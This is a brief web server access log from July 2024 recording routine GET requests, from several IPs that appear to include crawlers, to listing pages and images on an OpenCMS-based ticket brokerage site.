194.163.141.13 - - [19/Jul/2024:06:31:09 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=ADE200F3-CFF5-87E3-9021-7F29446BA859&sortorder=desc&column=section HTTP/1.1" 200 87885
194.163.141.13 - - [19/Jul/2024:06:31:33 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=ADE3597D-A6E8-88A2-2D38-4DA59DAE8129&sortorder=asc&column=row HTTP/1.1" 200 87915
47.128.20.31 - - [19/Jul/2024:06:31:54 +0200] "GET /ticket2/opencms/it/buy/?catid=E961462E-5AC2-64D6-5850-A310C9DEAA06&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 82796
194.163.141.13 - - [19/Jul/2024:06:31:54 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=ADE3597D-A6E8-88A2-2D38-4DA59DAE8129&sortorder=asc&column=section HTTP/1.1" 200 87915
47.128.20.31 - - [19/Jul/2024:06:31:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.20.31 - - [19/Jul/2024:06:31:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
66.249.79.173 - - [19/Jul/2024:06:32:03 +0200] "GET /ticket2/opencms/fr/buy?page=1&edid=DD282B35-B6B7-ECA0-02E0-90864F5E2B50 HTTP/1.1" 200 107163
66.249.79.173 - - [19/Jul/2024:06:32:03 +0200] "GET /ticket2/opencms/fi/buy?page=1&edid=E9A36455-AEA7-B86C-20AA-DBAA963F875E HTTP/1.1" 200 104153
66.249.79.233 - - [19/Jul/2024:06:32:16 +0200] "GET /ticket2/opencms/sv/magazine HTTP/1.1" 200 112544
